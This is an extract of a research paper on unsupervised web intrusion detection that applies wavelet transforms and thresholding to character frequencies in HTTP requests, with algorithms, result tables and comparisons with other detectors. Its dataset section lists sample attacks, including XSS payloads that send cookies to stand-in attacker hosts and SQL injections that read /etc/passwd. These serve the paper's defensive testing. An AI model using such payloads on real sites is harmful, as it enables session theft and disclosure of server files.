For a better understanding of the relevance of the comple-mentary information contained on the wavelet coefficients,a threshold operation could be performed, enabling to selectthe most significant wavelet coefficients and to discard irrel-evant information. According to Donoho and Johnstone [8],this operation does not destroy the fundamental properties ofthe signal, when the selection parameter (also called thresh-old value) is chosen in a “proper way”.

Therefore, a careful threshold process of timescale repre-sentations might be a promising tool to expose characteristicsof anomalies within the data, once attacks indeed cause sig-nificant variations of the wavelet coefficients, as observed inFig. 10a, b.

The design of a proper threshold is a fundamental issuefor the alarm detection problem as well as for any appli-cation involving compression, filtering or decision, since theefficiency of the wavelet detection system relies on the selec-tion of the wavelet coefficients (details) on the wavelet seriesassociated with invasive events. Recognizing the attack pat-

123


terns is still an open question, which here is brought outthrough the threshold operations.

According to [8], the threshold operation consists in com-paring the wavelet coefficients with a threshold value λ.Coefficients will be then modified according to some crite-ria, which can be more restrictive (hard thresholding, Eq. 1)or less restrictive (soft thresholding, Eq. 2). There are stillother possible criteria, for example, the hyper threshold,for more specific information about this topic, the worksfrom Donoho and Johnstone are suggested. The hard thresh-old keeps the significant coefficients unaltered, and the softthreshold has the tendency of smoothing the data, since eventhe significant coefficients are minimized by the thresholdvalue. Here in this work, only the Hard thresholding willbe explored in the alarm generation. According to Algo-rithm 2, the wavelet coefficients for the first decomposi-tion level are stored at the second half of the vector C ′,whose size is given by N = |C ′|. Now for the 2D case,the same heuristic is considered, and after the applicationof the complete of 1D transforms, the initial matrix willbe also used to store the coefficients for corresponding fourblocks. Nevertheless, to simplify the nomenclature and thenotation for the threshold operations, the wavelet coefficientsfor the three blocks cd, dc and dd are now treated as vec-tors and are denoted by d(k), with k = N/2 + 1, . . . , Nand N has to be set up accordingly to the decompositionlevel.

– Hard Threshold:

d(k) ={

0, |d(k)| < λ

d(k), |d(k)| ≥ λ(1)

– Soft Threshold:

d(k) =⎧⎨

⎩

0, |d(k)| < λ

d(k)− λ, |d(k)| ≥ λ ∧ d(k) ≥ 0d(k)+ λ, |d(k)| ≥ λ ∧ d(k) < 0

(2)

The selection of the threshold (or cutting) value is oneof the most delicate stages of this design. A wrong deter-mination may cause the failure of the detection process. Forthe numerical experiments, the cutting value will be initiallydetermined following the universal threshold value proposedby Donoho and Johnstone [7]:

λ = σ ·√2 log(N ), (3)

where N for the 1D case is the initial size of the vector beforethe wavelet transform is applied. In the 2D case, N is the sizeof the original matrix. In Eq. (3), σ is the standard deviation,computed from all wavelet coefficients after all decomposi-tion levels were obtained.

After applying the threshold operation on the waveletcoefficients, a set of the modified coefficients is thenobtained. If the information in the time domain has to bereconstructed, it is required to apply the inverse wavelet trans-form, providing then the corresponding filtered data. For theapplications considered in this paper, the inverse transformwill be not executed, and the alarm generation will be per-formed right after the threshold operation considering thehard threshold strategy.

4.4 Best approximation

The best approximation operation sorts the entire set ofwavelet coefficients generated by the wavelet transform andchooses those with larger magnitude [39]. The selection ofthe most representative wavelet coefficients from the entiretransformation produces a new series of coefficients, whoseresult after the inverse transform produces a closer approxi-mation to the original data. With this approach, the numberof wavelet coefficients used in the analysis can be reducedsignificantly. Algorithm 3 presents a pseudo code of the bestapproximation operation. Considering the vector C contain-ing just one level of the wavelet transform, the scaling coef-ficients are stored in the first half of vector C and the waveletcoefficients are stored in its second half. The other parameterfor the algorithm is the number of coefficients that will beconsidered after the sort, NB . That means, the first NB withthe largest magnitude is selected.

Algorithm 3: Best approximation operationinput : C : Array of datainput : NB : Number of best coefficients desiredoutput: C ′ : Array of data

1 N ← |C |// Ordering C in decreasing order of wavelet coefficientsmagnitude

2 for i ← 1 to N do3 I [i] ← i4 end5 Sort(I ) s.t. |C[ik ]| ≥ |C[ik+1]| for k = N/2+ 1..N6 for i ← 1 to N/2 do7 C ′[i] ← C[i]8 C ′[N/2+ i] ← 09 end

// Copying the NB best wavelet coefficients to result array10 for i ← N/2+ 1 to N/2+ NB do11 C ′[I [i]] ← C[I [i]]12 end13 return C ′

5 Wavelet-based algorithms for web intrusion detection

This section provides a description for the wavelet-basedalgorithms using one- and bidimensional wavelet transforms.

123


The one-dimensional wavelet transform will be denoted asTW1D, and the bidimensional one as TW2D. The hardthresholding and the best approximation method will be com-bined to TW1D and TW2D as thresholding criteria.

5.1 TW1D and hard thresholding

The main issue in applying TW1D in the set of URL queries,as stated in this paper while organizing the input data as matri-ces, is the fact that although the data sets present an intrinsicbidimensional structure and interconnection, the unidimen-sional transform, no matter if applied per columns or per rowson the input matrix, will not be able to capture this informa-tion variation in different directions, and consequently, therelation from one variable to the other in different directionswill not be taken into account throughout the unidimensionaltransform.

5.1.1 TW1D-by row

When the input data are analyzed by row, each one containingthe frequency distribution of one specific character through-out all requests, the TW1D captures all the significant vari-ations of this distribution, enabling also the identification ofthe starting and ending points of the significant variationsinside each row.

In Fig. 11, two examples of wavelet coefficients after onedecomposition level are presented. The analyzed data are thesame presented as in Fig. 4 (256 HTTP requests with oneDirectory Traversal attack). The analyzed rows in Case (a)and Case (b) correspond to the ASCII = 46 and ASCII =73 character, respectively. The marked dots are the identi-fied attacks, obtained by the threshold operation for severalthreshold values. The ρ · λ are all multiples (with constantfactor ρ) of the initial universal threshold value [Eq. (3)]. It isimportant to observe that for each row, a different thresholdvalue is obtained (λ computed for each row). Therefore, allsignificant coefficients remained after the threshold opera-tion are then associated to attacks.

This behavior indicates that simply analyzing the intensityvariation of the wavelet coefficients is not enough for an effi-cient attack detection. Another point is the fact that throughthe TW1D, no variations among lines can be verified at anystage of the analysis.

5.1.2 TW1D-by columns

Considering now TW1D applied by columns, each columnwill be associated with a specific request. Therefore, the inputdata for the transform will be the occurrence number of eachof the 256 ASCII characters for a fixed column. In addition,the threshold value is obtained for each column. In Fig. 12, theresulting wavelets coefficients for one level decomposition

0

2

4

6

8

10

12

14

16

18

1 25 65 105 145 185 225 256

Val

ue o

f wav

elet

coe

ffici

ent

2 λ

1.5 λ

1 λ

0

0.5

1

1.5

2

2.5

3

1 25 65 105 145 185 225 256

Val

ue o

f wav

elet

coe

ffici

ent

Request HTTP

2 λ

1.5 λ

1 λ

(a)

(b)

Fig. 11 Detected attacks for threshold values ρ ·λ. TW1D by row con-sidering the character distribution of (.) and (I) throughout 256 requestsof the data presented in Fig. 4 (with one directory traversal attack)

0

0.5

1

1.5

2

2.5

3

0 25 65(A) 105(i) 145 185 225 255

Val

ue o

f wav

elet

coe

ffici

ent

2 λ

1.5 λ

1 λ

0

1

2

3

4

5

6

7

8

0 25 65(A) 105(i) 145 185 225 255

Val

ue o

f wav

elet

coe

ffici

ent

Character ASCII

2 λ

1.5 λ

1 λ

(a)

(b)

Fig. 12 Detected attacks for threshold values ρ · λ. TW1D by columnfor two request (#3 and #28) in the window of data presented in Fig. 4

are presented for requests #3 and #28 for the data presentedin Fig. 4.

In Fig. 12, the detected attacks are represented by dots, andthey are associated with requests where the variation of thenumber of characters was considered high (by the thresholdoperation). Similar to the TW1D-by rows, it is obtained ahuge number of false positives for some threshold valuesand suddenly a drop for no detection at all. This behaviorindicates that either all single variations are being judged asattacks, or none of them are serving as alarms sensors. This iscaused by the lack of information to distinguish the variationscaused by anomalous behaviors.

5.2 TW1D and best approximation

The first step of the best approximation strategy is thedecreasing ordination of the entire set of wavelet coefficients.

123


The second step consists in the selection of the first NB coef-ficients with higher absolute values (according to Algorithm3 these will be the most significant coefficients). The N−NB

smaller coefficients are then discarded; that means their orig-inal values are therefore assumed to be zero. The main issuehere is the choice of the parameter NB ; nevertheless, evenfor NB small the representation of the main variations in thesignal is preserved.

When the TW1D is applied, indifferently if by rows orcolumns, the parameter NB for each row or column willdetermine the number of detected attacks. The problem hereis that according to the attack sensor designed until now,each time a wavelet coefficient is labeled as significant, analarm will be assign, even though it is not related to a realattack. This observation leads us to the necessity of usingcomplementary information in order to distinguish betweentwo kinds of significant wavelet coefficients: those relatedto attacks and those related just to strong local variations,but still related to the normal behavior of the system. Thisperception motivates therefore the design of a second layerof analysis of the wavelet coefficients, which could be inter-preted as a refinement step of the threshold operation. Thisissue is discussed in next sections.


As stated in Sect. 4.2 and shown in Figs. 9 and 10, the TW2Dwill generate a set of scaling coefficients, denoted by (cc),and three sets of wavelet coefficients, (cd), (dc) and (dd), allof these four blocks with dimension N/2× N/2.

The attack sensor presented in this work is designed con-sidering the thresholded wavelet coefficients, correspondingto the blocks (c̃d), (d̃c) and (d̃d). The set of first attackcandidates are those associated with significant coefficientslabeled after the thresholding operation.

The ρ parameter is a constant factor that corrects the uni-versal threshold value [Eq. (3)] calculated over the corre-sponding block. The set of wavelet coefficients associatedwith anomalous variations (consequently judged as attacks)will be composed by those elements labeled as significantin at least two different blocks of wavelets coefficients (line6) at the same time, this means, for the same indexes i, j .This heuristic takes into account the impact that variationsin a specific direction can cause in the others. Algorithm 4presents the pseudo code for this heuristic.


In this approach, the core operation for attack detection isthe best approximation method that selects the NB waveletcoefficients with higher magnitude. The decision heuristicis similar to the Algorithm 4. Each block is decreasinglyordered, and the NB higher coefficients are labeled as signif-

Algorithm 4: Attack detection using TW2D + hardthresholding

input : M :Matrix of data;ρ : constant factor of λ

output: A : Set of attack positions

1 A← ∅2 (cc, dc, cd, dd)← T W 2D[M] one level

// Attack candidates - 1st selection.3 c̃d ← Hard − T resholding(cd, ρ)

d̃c← Hard − T resholding(dc, ρ)

d̃d ← Hard − T resholding(dd, ρ)

// Attack candidates - final selection.4 for i ← 1 to N/2 do5 for j ← 1 to N/2 do

// Attack if at position (i,j) at least two thresholdedblocks contain significant coefficients

6 if (c̃di, j > 0 ∧ d̃ci, j > 0)∨ (c̃di, j > 0 ∧ d̃di, j > 0)∨(d̃ci, j > 0 ∧ d̃di, j > 0) then

// Attack detected, save the position7 A←− A + (i, j)8 end9 end

10 end11 return A

icant. The sensor will classify as attack the events occurringat positions related to significant coefficients for at least twoblocks of wavelet coefficients.

One observation here is that for small values of NB , a smallnumber of false positives are obtained; however, when NB

increases, the number of false positives also increases. Thismeans that this heuristic now is more sensitive for the choiceof the parameter NB . This motivates the proposal of havingmore layers of decision in the detection procedure, since onlythe parameter NB itself cannot control and decide at the sametime which variations are indeed associated with attacks.With the interest of developing an alarm sensor involving theTW2D and best approximation, we introduce a second refine-ment step for performing the attacks classification. Next sec-tion addresses this issue.

5.5 TW2D, best approximation and refinement step

Algorithm 5 describes the application of the TW2D—bestapproximation method with one refinement criterion. Theinput of the algorithm is a data matrix according to Fig. 2 inSect. 3. The output is a set of positions of HTTP requestsdetected as attacks. As discussed at Sect. 4, one level ofthe wavelet transform is performed, and the correspondingwavelet coefficients are stored in blocks denoted by (dc),(cd) and (dd).

The main difference with respect to the previous algo-rithms consists in the fact that in Algorithm 5, besides the

123


Algorithm 5: Attack detection using TW2D + bestapproximation + refinement

input : M :Matrix of dataoutput: A : Set of attack positions

1 A← ∅2 (cc, dc, cd, dd)← T W 2D[M] one level

// Attack candidates - 1st selection:// Best Approx.: NB bigger wavelet coefficients

3 Sort(cd)← (dcd1 , dcd

2 , .., dcdNB

) s.t. |dcdi | ≥ |dcd

i+1|4 Sort(dc)← (ddc

1 , ddc2 , .., ddc

NB) s.t. |ddc

i | ≥ |ddci+1|

5 Sort(dd)← (ddd1 , ddd

2 , .., dddNB

) s.t. |dddi | ≥ |ddd

i+1|// Attack candidates - 2st selection:// Just for the already chosen significant coefficients

6 for i ← 1 to NB do

7 ηi ← 0.1 · dcdi + 0.8 · ddc

i + 0.1 · dddi

8 α← 1.09 if ddc

i ≥ α · ηi then

// Evaluate difference between details10 μcd

i ← dcdi - dcd

i+1

11 μdci ← ddc

i - ddci+1

12 μddi ← ddd

i - dddi+1

// Weighted average of the details differences13 β ← 0.2614 εi ← 0.25 · μcd

i + 0.50 · μdci + 0.25 · μdd

i15 ρi ← max(μcd

i , μdci , μdd

i )

// Attack detection - Final selection16 if εi ≥ β · ρi and Row and column of i is the same in at

least two blocks then

// Attack detected, save the position17 A←− A + {i}18 end19 end20 end21 return A

first selection of the significant wavelet coefficients from thethree blocks, two more steps are introduced in order to refinethe set of wavelet coefficients assigned to attacks. This refine-ment step drastically increases the quality of the attack sen-sor, in the sense that the number of false-positive detectionsdrops considerably in a very robust and consistent way.

Similar to Algorithm 3 described in the Sect. 5.4, the firstselection criterion is to apply the best approximation method,and consequently, the threshold value NB is considered as aninput parameter. In the worst case scenario, when the webapplication is target of many attacks, the value NB is highermeaning that more coefficients are selected for the analysis.In the numerical tests, the maximum value considered wasNB = N/2, corresponding to the choice of λ as the medianof the wavelet coefficients. Another possible choice is NB =N/4 , corresponding to the first quartile of all coefficients (inthe sense of statistic measurements).

The second selection (starting at line 6 of Algorithm 5) fil-ters the attack candidates selected so far. A convex weightedaverage of details is performed, where the block (dc) receivesthe biggest weight. The block (dc) is more sensible to thevariations among requests, since it corresponds to differ-ences in horizontal direction, according to the data structureselected in Sect. 3. The proposed heuristic to design the alarmsensor is to presume that only values of the privileged block(dc) greater than or equal to the weighted average are thenext possible attacks candidates.

Since the Haar wavelet coefficients are differences betw-een two consecutive data (multiplied by 1/

√2), they are close

to discrete derivatives (in the sense of finite differences), thenvariations between consecutive Haar wavelet coefficients canbe seen as approximations for second derivatives of the ana-lyzed data. Therefore, the final selection criterion considersthe evaluation of differences among details from the threeblocks, capturing strong variations in the sense of the “sec-ond derivative” approximations. These detail differences areused to compute a second weighted average, which is definedby a different set of weights, but the block (dc) remains beingthe privileged one and receives again the bigger weight onthe convex combination. The selection test (line 16) analyzesthen: (1) if the variation of the variations of information at aspecific point is bigger than all variations around, in all dis-crete directions defined by the wavelet blocks, and (2) if thisposition is also a significant position for any other waveletblock. Here, two new parameters are introduced: α and β,which are responsible for the relaxation of the values definedfor the selection.

5.6 TW2D, hard thresholding and refinement step

In order to demonstrate the robustness of the refinement stepproposed in Algorithm 5, we replace the best approximationmethod by the hard threshold operation at the first step of can-didates selection. All other steps of the algorithm remainedunchanged. The results of applying this algorithm are dis-cussed in Sect. 6.

6 Experiments and discussion

This section provides numerical experiments with two maingoals in order to highlight the contribution of this manu-script: (1) to show some deficiencies of alarm generationbased only on the one-dimensional wavelet transform and(2) to present and explore the potential of the bidimen-sional wavelet transform in designing efficient alarm gen-erators. Figure 13 presents the organization scheme of theexperiments. The one-dimensional wavelet transform will bedenoted as TW1D and the bidimensional one as TW2D. Andfor both transform hard thresholding and the Best approxima-

123


Fig. 13 Design of the numerical experiments considering two selec-tion techniques associated with the wavelet transforms

tion operation will be considered in the analysis. A prelimi-nary study considering only the hard thresholding associatedwith the TW2D was presented by our group in [28]. In thecurrent work, both the set of simulation cases and the pos-sible analyzing tools were extended in order to stress andenriched the discussion.

6.1 Data set for experiments

The so-labeled PFUNA data set was collected in the Poly-technic Faculty of the National University of Asunción,Paraguay. This data set contains web traffic information of aproduction web server. In this work, 3-month data are ana-lyzed, from January to March 2009, considering the first dayof collection as January 11, and the last day as being March15. Therefore, the number of analysis days per month was21, 28 and 22, respectively, totalizing 71 days of collectedtraffic.

The web application chosen from the production webserver is an application developed by PFUNA that offersseveral resources on its portal (www.pol.una.py). In Table 2,some statistics about queries for the web application are pre-sented. The total number of HTTP requests contained in theanalyzed data set is 59,248. This total number was then trans-lated into average numbers of queries by second, minute, hourand day. Through these statistics, the amount of queries thatarrives to the web application per second, minute, hour andday is estimated.

In order to validate the proposed methodology as an effec-tive tool for analyzing realistic data sets, and to computethe number of correct attack detections, a synthetic data setwas simulated by the removal of the reported known attacksfrom the original one, here the PFUNA dataset. In order toproduce this kind of “attack-free” data, events considered asattacks were removed in two ways: manually based on visual

Table 2 Average amount of data from the PFUNA web applications

Month Days Queries Query average by

Sec Min Hour Day

1 21 11,563 0.006 0.382 22.942 550.619

2 28 29,965 0.012 0.743 44.590 1, 070.178

3 22 17,720 0.009 0.559 33.560 805.454

Table 3 Attack distribution within PFUNA dataset

Case Attacks Quantity (window)

A 0 –

B 1 1 (1)

C 2 2 (1)

D 3 3 (1)

E 4 4 (1)

F 5 5 (1)

G 10 6 (1), 3 (2), 1 (3)

H 20 6 (1), 3 (2), 1 (3), 2 (19), 3 (20), 1 (23),1 (25), 2 (28), 1 (31)

The quantity (window) column represents the number of attacks in thewindow

inspection or through the IDS widespread used in scientificcommunity for detecting signatures, called Snort [46].

The data set is divided into windows of 256 requests with-out attacks. The total number of processing windows is 232.As the total request number is 59,248, in the last window144 null requests are introduced in order to keep the samewindow data structure.

The attacks of types A1 and A2 (see Table 1) were insertedin the PFUNA data set. In Table 3 is presented the choseninsertion distribution. The first column states the label ofeach one of the numerical tests executed in this section. Thesecond column of Table 3 indicates the number of attacksinserted in the window. For example in Case D, the value3 (1) represents that 3 attacks were arbitrarily inserted inwindow 1.

The inserted attacks are Directory Traversal (A1),XSS (A2), SQL Injection (A1) and Code-Red (A1), and theywere constructed as follows:

Directory Traversal attack, coded and not coded, with fourto six injected attack strings “../”. This increase over thetraditional character frequency is near the lowest value toreach the root directory.

XSS, coded and not coded, with special semantic charac-ters such as {& < > ; ( ) ’ : / *} varying from sixto eight additional occurrences over its attack-free frequency.Bellow, three examples of injected XSS attacks.

Ex1) <script>document.location=’http://attackerhost.example/cgibin/cookiesteal.cgi?’+document.cookie</script>

123

www.pol.una.py


Table 4 True and false positives obtained applying the TW1D by rows

Attacks No. of attacks detected for different ρλ

1λ 1.5λ 2λ 2.5λ 3λ 3.5λ 4λ 5λ

FP TP FP TP FP TP FP TP FP TP FP TP FP TP FP TP

0 14,816 0 6,418 0 3,614 0 2,016 0 767 0 753 0 0 0 0 0

1 14,816 1 6,418 1 3,611 1 2,016 1 767 1 753 1 0 0 0 0

2 14,793 2 6,429 2 3,604 1 2,012 1 775 1 762 1 0 0 0 0

3 14,815 3 6,414 3 3,610 3 2,015 3 766 2 753 2 0 0 0 0

4 14,815 4 6,414 4 3,610 3 2,015 3 766 3 753 2 0 0 0 0

5 14,819 5 6,448 5 3,575 4 1,977 4 777 2 763 1 0 0 0 0

10 14,746 10 6,481 9 3,575 9 2,026 6 767 4 754 3 0 0 0 0

20 14,760 20 6,495 19 3,569 19 2,019 13 758 7 747 6 0 0 0 0

59,248 request without attacks. Attacks insertion: Cases A–H Table 3

Ex2) </SCRIPT>’>’><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>

Ex3)<img src=“http://trusted.org/account.asp?ak=

<script> document.location.replace(’http://evil.org/

steal.cgi?’+document.cookie);</script>”>

SQL Injection, coded and not coded, with special seman-tic characters such as { & < > ; ( ) ’ : / * ’ }injected in a quantity that exceeds at least four or six timesthe regular frequency. Examples of SQLI injected attacks arepresented bellow.

Ex1) %27/**/+union+/**/select /**/+1,2,3,version(),user(),6/**/–+

Ex2) /**/ utl_inaddr_get_host_name((select /**/ bannerfrom v$version /**/where rownum=1))–

Ex3) /**/+union+/**/select /**/NULL,LOAD_FILE(’////etc/////passwd’)/**/’

The last type of injected attack is Code-Red (I and II)with “N” or “X” character repeated at least 200 times. Thecharacters “N” or “X” are the typical signature injected onCode-Red I and II, respectively.

The Directory Traversal and Code-Red attacks are vari-ants constructed based on the attacks database [15] that con-tains Code-Red (I and II), Directory Traversal (e.g., Nimbda,Apache Win32 Directory Traversal) and Buffer Overflowattacks.


The main issue in applying TW1D in the set of HTTP trafficdata, as stated in this paper while organizing the input dataas matrices, is the fact that although the data sets presentan intrinsic bidimensional structure and interconnection, theunidimensional transform, no matter if applied per columns

or rows on the input matrix, will not be able to capturethis information variation in different directions, and con-sequently, the possible existing relations involving one vari-able to others will be not taken into account throughout theunidimensional transforms.

6.2.1 TW1D-by row

The numbers of attacks detected according the thresholdvalue associated with the Hard thresholding are then pre-sented in Table 4. The set of simulations includes all 232windows, with attacks inserted according to Table 3. For eachthreshold value, the number of wrongly detected attacks iscomputed as FP (false positive) and the correctly detectedattacks are then computed as TP (true positive).

Based on Table 4 results, it is possible to observe a hugeamount of FP for almost all threshold values. There is a tran-sition range of values between 3.5λ and 4λ, where the num-ber of false positives is minimized, and after that no falsepositives occur, by the price of no attack detection at all.

In fact, this range can be even subdivided, neverthelesskeeping the same kind of pattern. Either a big number offalse positives, or no detection at all. This behavior indicatesthat simply analyzing the intensity variation of the waveletcoefficients is not enough for an efficient attack detection.Another point is the fact that through the TW1D no variationamong lines is being considered at any stage of the analysis.

6.2.2 TW1D-by columns

Considering now TW1D applied by columns, each columnwill be associated with a specific request. Therefore, the inputdata for the transform will be the occurrence number of eachof the 256 ASCII characters for a fixed column. In addition,the threshold value is obtained for each column.

123


Table 5 True- and false-positive results applying the TW1D by columns


1λ 1.5λ 2λ 2.5λ 3λ 3.5λ 4λ 5λ


0 59,248 0 59,248 0 59,243 0 42,525 0 2,544 0 0 0 0 0 0 0

1 59,247 1 59,247 1 59,242 1 42,526 1 2,544 0 0 0 0 0 0 0

2 59,248 2 59,248 2 59,243 2 42,527 2 2,545 0 0 0 0 0 0 0

3 59,245 3 59,245 3 59,240 3 42,524 2 2,546 1 1 0 0 0 0 0

4 59,244 4 59,244 4 59,239 4 42,524 3 2,547 1 1 0 0 0 0 0

5 59,244 5 59,244 5 59,239 5 42,524 4 2,548 1 1 0 0 0 0 0

10 59,244 10 59,244 10 59,239 10 42,526 7 2,552 2 2 0 0 0 0 0

20 59,244 20 59,244 20 59,239 20 42,528 15 2,558 6 2 0 0 0 0 0

59,248 request without attacks. Attacks insertion: Cases A–I Table 3

Table 6 True- and false-positive results for TW2D + hard thresholding


1λ 1.5λ 2λ 2.5λ 3λ 3.5λ 4λ 5λ


0 15,971 0 4,452 0 1,939 0 14 0 7 0 2 0 1 0 0 0

1 15,970 1 4,451 1 1,934 1 15 1 8 1 3 1 2 1 0 1

2 15,969 2 4,451 2 1,934 2 14 2 7 2 2 2 1 2 0 2

3 15,911 3 4,447 3 1,934 3 14 3 7 2 3 3 1 3 0 3

4 15,909 4 4,447 4 1,934 4 14 4 7 4 2 4 1 4 0 4

5 15,887 5 4,387 5 1,874 5 28 5 3 5 1 5 1 5 0 5

10 15,774 10 4,308 10 1,940 10 15 10 7 10 2 10 1 10 0 10

20 15,420 20 4,107 20 1,876 20 16 20 3 20 1 20 1 20 0 20

PFUNA data set. 59,248 requests without attack

The numerical results for the attacks detection is presentedin Table 5. Again 232 windows are analyzed with attacksinserted according to Table 3.

Similar to the TW1D-by rows, a huge number of falsepositives for some threshold values are obtained and suddenlya drop for no detection at all. This behavior indicates thateither all single variations are being judged as attacks, ornone of them are serving as alarm sensors. This is caused bythe lack of information to distinguish the variations causedby anomalous behaviors.


As pointed out in Sect. 4.4, the first step of the best approx-imation strategy is the decreasing ordination of the entireset of wavelet coefficients. The second step consists of theselection of the NB most significant coefficients in absolutemodulus. The N − NB smaller coefficients are simply notanalyzed. The main issue is the choice of the parameter NB .

The performance of the attack detection degrades veryfast with the increase in the parameter NB ; this means thatfor NB > 9 the number of false-positive jumps from order 10to order 100, and for NB > 29, it drops for order 1,000. Sincethe behavior of the best approximation procedure involvingTW1D and TW2D are very similar, the results for unidimen-sional case are omitted and the results for the TW2D in asso-ciation with the best approximation procedure are presentedin Sect. 6.5.


Table 6 presents the detection results obtained by the Algo-rithm 4. It is important to observe that when the correct rangefor the threshold value is used, the number of false positives isdrastically reduced, and for the threshold value being 5 timesthe universal threshold value, no false positives are obtainedand the detection of all attacks is done successfully. In [28], adiscussion about the choice of 5 times the universal thresholdvalue is presented for a simpler attack sensor.

123


Table 7 True- and false-positive results for detection with TW2D + best approximation

Attacks NB greater wavelet coefficients

1 5 10 20 30 40 50 60 64

FP TP FP TP FP TP FP TP FP TP FP TP FP TP FP TP FP TP

0 0 0 13 0 120 0 586 0 1,319 0 1,888 0 2,379 0 2,943 0 3,233 0

1 0 1 13 1 120 1 587 1 1,318 1 1,887 1 2,378 1 2,943 1 3,233 1

2 0 1 13 2 120 2 586 2 1,317 2 1,887 2 2,377 2 2,940 2 3,230 2

3 0 1 13 3 120 3 587 3 1,319 3 1,887 3 2,379 3 2,944 3 3,233 3

4 0 1 13 4 120 4 587 4 1,318 4 1,887 4 2,378 4 2,944 4 3,234 4

5 1 1 17 5 102 5 561 5 1,314 5 1,888 5 2,353 5 2,971 5 3,242 5

10 2 3 19 10 129 10 635 10 1,397 10 1,925 10 2,439 10 3,031 10 3,314 10

20 0 9 14 20 111 20 626 20 1,414 20 1,967 20 2,416 20 3,043 20 3,334 20

PFUNA data set. 59,248 request without attack


The results obtained for attack identification combiningTW2D and the best approximation method are presented inTable 7. Observe that for small values of NB (in the rangeof 2–9, as summarized in the column for NB = 5), a smallnumber of false positives are obtained; however when NB isincreased, the number of false positives also increases. Thismeans that the information contained in the wavelet coeffi-cients in some sense is not correctly classified, and conse-quently, the attacks cannot be properly detected. The secondrefinement step for performing the attack classification isintroduced, and in the next section the results for this caseare presented.

6.6 TW2D, best approximation and refinement step

In Table 8, the results of the best approximation with refine-ment (Algorithm 5) are presented for different choices of theparameter α. All attacks inserted in the PFUNA data set weredetected, and the algorithm performance shows to be sensiblewith respect to the refinement parameter α. Recalling here,α is the weight to be attributed for the convex combinationof the significance computed based on the three blocks ofwavelet coefficients. And significance here is the decisionquantity to indicate if an alarm has to be set or not.

6.7 TW2D, hard thresholding and refinement step

In order to demonstrate the robustness of the refinement stepproposed in Algorithm 5, we replace the best approximationmethod by the hard threshold operation in order to select thefirst set of candidates (first step). All other steps of the algo-rithm remained unchanged. The results for the same groupof numerical experiments are presented in Table 9 consider-ing the parameter α = 1.0. The detection results were kept

Table 8 True- and false-positive results for detection with TW2D +best approximation + refinement

Attacks α

1 1.025 1.05 1.075 1.1 1.125

FP TP FP TP FP TP FP TP FP TP FP TP

0 0 0 0 0 0 0 0 0 0 0 0 0

1 0 1 0 1 0 1 0 1 0 1 0 1

2 0 2 0 2 0 1 0 1 0 1 0 1

3 0 3 0 3 0 3 0 0 0 0 0 0

4 0 4 0 4 0 4 0 4 0 0 0 0

5 0 5 0 5 0 0 0 0 0 0 0 0

10 0 10 0 10 0 10 0 10 0 1 0 1

20 0 20 0 20 0 20 0 20 0 11 0 11

PFUNA data set. 59,248 request without attack + 20 inserted attacks

invariable for 1.0 ≤ α < 1.1, and the parameter β remainedas a constant. It is possible to observe that the refinement stepintroduces a significant gain in performance of the alarm sen-sor proposed in this work, where the wavelet coefficients ofthe bidimensional Haar wavelet transform is a key part forthe entire computation.

7 Comparisons with other techniques

The two algorithms without training stage proposed in thiswork are compared with other five algorithms for detect-ing anomalies in HTTP requests; nevertheless, all these fivealgorithms need a training preprocessing stage. The well-established algorithms implemented for comparison are thefollowing:

– “6BIN”: based on the Pearson Chi-square test with group-ing of six bins [21,22].

123


Table 9 True- andfalse-positive result fordetection with TW2D + hardthresholding + refinement

PFUNA data set. α = 1.0.59,248 request without attacks +20 inserted attacks


1λ 1.5λ 2λ 2.5λ 3λ 3.5λ 4λ 5λ


0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0

1 0 1 0 1 0 1 0 0 0 0 0 0 0 0 0 0

2 0 2 0 2 0 2 0 1 0 0 0 0 0 0 0 0

3 0 3 0 3 0 3 0 3 0 2 0 0 0 0 0 0

4 0 4 0 3 0 3 0 1 0 1 0 1 0 1 0 1

5 0 5 0 4 0 4 0 2 0 2 0 2 0 0 0 0

10 0 10 0 9 0 8 0 6 0 6 0 7 0 4 0 0

20 0 20 0 18 0 17 0 13 0 11 0 12 0 9 0 0

Table 10 Comparisons betweenalgorithms Attacks Algorithms

6BIN 3BIN MD DBIN NGRAM TW2D-HT TW2D-BA

FP TP FP TP FP TP FP TP FP TP FP TP FP TP

0 0 0 0 0 6 0 0 0 0 0 0 0 0 0

1 0 0 0 0 6 1 0 0 0 1 0 1 0 1

2 0 0 0 0 6 2 0 0 0 2 0 2 0 2

3 0 1 0 0 6 2 0 0 0 3 0 3 0 3

4 0 2 0 0 6 3 0 0 0 4 0 4 0 4

5 0 3 0 0 6 4 0 0 0 5 0 5 0 5

10 0 8 0 0 6 8 0 0 0 10 0 10 0 10

20 0 13 0 0 6 18 0 0 0 20 0 20 0 20

– “3BIN”: based on the Pearson Chi-square test with group-ing of three bins [38].

– “MD”: based on the Mahalanobis distance used in [44].– “DBIN”: based on the Pearson Chi-square test with

dynamic grouping [19].– “NGRAM”: based on n-gram presented by [15]. The

model implemented considers the following: Let c thenumber of n-grams of current request presents in the setof normal n-grams, and t the total number of n-grams incurrent request. If the relation c

t is less that T (T ∈ [0, 1])the current request is considered as anomalous.

The comparison results are presented in Table 10. Thelabel TW2D-HT (TW2D—hard thresholding with refine-ment) indicates the Algorithm presented in the Sect. 5.6 andTW2D-BA (TW2D—best approximation with refinement)in the Sect. 5.5. For the experiments results as shown inTable 10, the training data set for the algorithms NGRAM,MD, 6BIN, 3BIN and DBIN was 100 % of data set withoutattacks presented as Case A of Table 3.

The results shown in Table 10 clearly indicate a supe-rior performance of the two algorithms proposed here with

respect to the four from the five analyzed options (MD,6BIN, 3BIN and DBIN). The algorithm NGRAM whentrained with 100 % of the data set without attacks obtains thesame number of false positives and true positives than ouralgorithms.

In the case of algorithm NGRAM, for the experimentspresented here the considered threshold is T = 0.95 (i.e.,at most 95 % of current request n-grams must be in the setof normal n-grams). The size of n-gram used was between 2and 10 with no variation in the final detection results.

For the algorithms 6BIN and 3BIN, the value assumedas threshold was 10 % of the maximum value of Chi-squareobtained in the training phase. In the case of algorithm MD,the threshold used was 256. This threshold value allows eachcharacter to have a fluctuation range of one standard deviationfrom its mean. This is explained in the paper [44].

The best results given in Table 10 (100 % detection ratewithout false positives) correspond to the NGRAM and thetwo proposed algorithms. The MD achieves the worst resultswith respect to the high amount of false-positive detections.The 3BIN and the DBIN achieve the worst results withrespect to the amount of true positive detections. The 6BIN

123


0

250

500

750

1000

1250

1500

1750

2000

2250

